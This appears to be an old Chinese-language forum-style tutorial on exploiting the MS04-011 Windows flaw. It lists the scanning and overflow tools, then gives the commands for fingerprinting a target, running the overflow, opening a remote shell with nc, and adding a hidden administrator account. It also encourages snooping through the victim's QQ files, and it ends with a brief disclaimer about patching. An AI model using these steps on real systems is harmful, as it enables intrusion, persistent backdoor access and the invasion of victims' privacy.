Ms04011漏洞

呵呵，大家都应知道这个漏洞吧，哈哈，它好厉害哦。HACKER们利用它来可以得到操作系统的administrators权限，得到系统的shell。不多说别的，看看他们都是入何入侵别人的机器吧。

 

1．  首先，去下载ms04011漏洞溢出的工具，网上有好多哦。

工具中包括了DSScan， GetOS, MS04011溢出工具

DSScan:这个工具是用来扫描系统是否有MS04011漏洞的工具，当扫描到目标机器就此漏洞，便会列出它的ip地址，主机名， netbios名称,  还有最重要的就是状态信息. 它可以扫描到在此ip断内所有存活的主机，如果有MS04011漏洞的机器，在状态信息就列出vulnerable,否则为not vulnerable。一般一次扫描64个ip地址。

GetOS:其是用来获得操作系统的类型，但必须对方机的139端口开放.

MS04011:其就是用来溢出的工具了.

2.如何溢出

首先用DSScan，在IP断内输入IP, 然后点那个右键头，使其进入右边的框内，可以多选

然后点击开始就可以.例如，我们扫到一个机器的结果为这样

Ip                      hostname           netbios              status

192.168.1.33       You                You                vulnerable

192.168.1.34       haha               haha                not vulnerable

大家可以看到192.168.1.33的机器status为vulnerable,这就说明它存在这ms04011的漏洞。

下面就让我们去溢出它吧，在开始溢出前先要得到对方机器的类型。用Getos来得到

在运行用输入cmd,回车，然后到你的程序路径下，输入getos 192.168.1.33

结果就会出现

[*] Connecting Port 139…..

[*] Sending session request…..

[*] Sending negotiation request….

[*] Sending setup account request….

[*] Successful…….

Remote OS:

-------------

WORKGROUP   这是工作组名

Windows 2000 LAN Manger  

Windows 5.0     这就是操作系统的类型，如果为windows 5.1那么就是xp 了

好了，我们知道它的类型是2000了，那么我们就马上用 ms04011来溢出吧

先打开两个cmd窗口, 在两个里面同时输入ms04011 0 192.168.1.33 然后一个一个的回车

在一个cmd里会出现

Shellcode size 404

Ret value = 1726  //注意1726才是溢出成功的代码

对于xp系统要用    Ms04011 1 192.168.1.33

3.如何得到机器的shell

要用到最厉害的瑞士军刀了(名称是NC), 哈哈，这个工具可不一般啊，到网上下载吧

然后在cmd内输入nc 192.168.1.33 1234。 1234是溢出的端口号.哈哈是不是出现了这样的提示

C:/winnt/system32>

//哈哈，你成功了。你可以对其操作了

 

比如：

Net user haha 123 /add        //在对方机器可以建立名为haha, 密码为123 的用户

Net localgroup administrators haha /add  //使haha列入administrators组.

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

 

当然可以到应用程序的tencent目录里看看MM的QQ号啊，以后常联系哦。

 

 

严重声明：不可以利用此方法做非法行为，如发现本人不负任何责任。发表此文的目的在于使大家重视自已系统的安全，常打补丁。在国内有好多的机器存在这样的漏洞，唉！！！！！